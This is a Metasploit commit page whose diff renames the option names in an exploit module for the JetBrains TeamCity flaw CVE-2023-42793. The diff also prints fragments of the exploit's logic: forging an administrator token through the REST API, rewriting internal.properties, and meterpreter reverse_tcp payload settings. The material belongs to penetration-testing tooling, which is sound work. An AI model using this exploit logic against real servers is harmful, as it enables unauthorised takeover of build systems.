Skip to content

Commit

Permalink
use the correct naming convention for normal options.
Browse files Browse the repository at this point in the history
  • Loading branch information
sfewer-r7 committed Sep 28, 2023
1 parent 9a6e2da commit 89940e8
Show file tree
Hide file tree
Showing 2 changed files with 30 additions and 30 deletions.
Original file line number Diff line number Diff line change
Expand Up @@ -39,16 +39,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TeamCityAdminID 1 yes The ID of an administrator account to authenticate as
TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file
TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file
TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
Expand Down Expand Up @@ -118,16 +118,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TeamCityAdminID 1 yes The ID of an administrator account to authenticate as
TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file
TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file
TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -62,10 +62,10 @@ def initialize(info = {})
# By default TeamCity listens for HTTP requests on TCP port 8111.
Opt::RPORT(8111),
# The first user created during installation is an administrator account, so the ID will be 1.
OptInt.new('TeamCityAdminID', [true, 'The ID of an administrator account to authenticate as', 1]),
OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),
# We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait.
OptInt.new('TeamCityRetryCount', [true, 'The number of times to retry reading the internal.properties file', 10]),
OptInt.new('TeamCityRetryWait', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3])
OptInt.new('TEAMCITY_RETRY_COUNT', [true, 'The number of times to retry reading the internal.properties file', 10]),
OptInt.new('TEAMCITY_RETRY_WAIT', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3])
]
)
end
Expand Down Expand Up @@ -95,7 +95,7 @@ def check
end

def exploit
token_uri = "/app/rest/users/id:#{datastore['TeamCityAdminID']}/tokens/RPC2"
token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"

res = send_request_cgi(
'method' => 'POST',
Expand All @@ -121,9 +121,9 @@ def exploit

unless res&.code == 200
# One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here
# and instruct the user to choose a new ID via the TeamCityAdminID option.
# and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.
if res && (res.code == 404) && res.body.include?('User not found')
print_warning('User not found, try setting the TeamCityAdminID option to a different ID.')
print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')
end

fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')
Expand Down Expand Up @@ -219,15 +219,15 @@ def modify_internal_properties(token, key, value)

unless res&.code == 200
# If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The
# server will return a 302 redirect if this is the case. Choose a different TeamCityAdminID and try again.
# server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.
if res&.code == 302
print_warning('This user is not an administrator, try setting the TeamCityAdminID option to a different ID.')
print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')
end

return false
end

0.upto datastore['TeamCityRetryCount'] do
0.upto datastore['TEAMCITY_RETRY_COUNT'] do
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri('/admin/admin.html'),
Expand All @@ -249,7 +249,7 @@ def modify_internal_properties(token, key, value)

print_status('Waiting for config change to be picked up...')

sleep(datastore['TeamCityRetryWait'])
sleep(datastore['TEAMCITY_RETRY_WAIT'])
end

true
Expand Down

0 comments on commit 89940e8

Please sign in to comment.